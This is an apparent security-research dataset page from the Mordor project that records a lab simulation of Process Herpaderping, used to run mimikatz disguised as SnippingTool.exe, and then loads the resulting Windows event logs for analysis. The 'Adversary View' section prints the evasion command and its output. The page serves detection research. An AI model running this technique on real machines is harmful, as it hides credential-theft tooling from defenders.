.ipynb .pdf

repository open issue suggest edit

Binder Colab Live Code

Contents

Process Herpaderping Mimikatz

Metadata

Author	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/10/26
Modification Date	2020/10/26
Tactics	[‘TA0004’, ‘TA0005’]
Techniques	[‘T1055’]
Tags	None

Dataset Description

This dataset represents the execution of a Process Herpaderping to obscure the intentions of a process by modifying the content on disk after the image has been mapped.

Datasets Downloads

Dataset Type	Link
Host	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/cmd_process_herpaderping_snippingtool.zip

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author	Name	Link

Simulation Plan

Environment	Tool Type	Module
Lab VM	Manual	Cmd

Adversary View

C:\Users\wardog>cd Desktop

C:\Users\wardog\Desktop>ProcessHerpaderping.exe mimikatz.exe wardog.exe C:\Windows\system32\SnippingTool.exe
Process Herpaderping Tool - Copyright (c) 2020 Johnny Shaw
[12140:10252][OK]    Source File: "mimikatz.exe"
[12140:10252][OK]    Target File: "wardog.exe"
[12140:10252][INFO]  Copied source binary to target file
[12140:10252][INFO]  Created image section for target
[12140:10252][INFO]  Created process object, PID 8924
[12140:10252][INFO]  Located target image entry RVA 0x000c3aec
[12140:10252][OK]    Replacing target with "C:\Windows\system32\SnippingTool.exe"
[12140:10252][OK]    Preparing target for execution
[12140:10252][INFO]  Writing process parameters, remote PEB ProcessParameters 0x0000000000AED020
[12140:10252][INFO]  Creating thread in process at entry point 0x00007FF733E63AEC
[12140:10252][INFO]  Created thread, TID 12112
[12140:10252][OK]    Waiting for herpaderped process to exit
[12140:10252][OK]    Herpaderped process exited with code 0xc000013a
[12140:10252][OK]    Process Herpaderp Succeeded

C:\Users\wardog\Desktop>

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/cmd_process_herpaderping_snippingtool.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)

+------------+------------------------------------+-------+-----+
|Hostname    |Channel                             |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10     |128  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7      |107  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13     |19   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12     |8    |
|WORKSTATION5|Security                            |4658   |4    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|1      |3    |
|WORKSTATION5|Security                            |4688   |3    |
|WORKSTATION5|Security                            |4663   |2    |
|WORKSTATION5|Security                            |4673   |2    |
|WORKSTATION5|Security                            |4656   |2    |
|WORKSTATION5|Security                            |4690   |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11     |1    |
|WORKSTATION5|Security                            |1102   |1    |
+------------+------------------------------------+-------+-----+

Empire Invoke InternalMonologue Covenant ShellCmd InstallUtil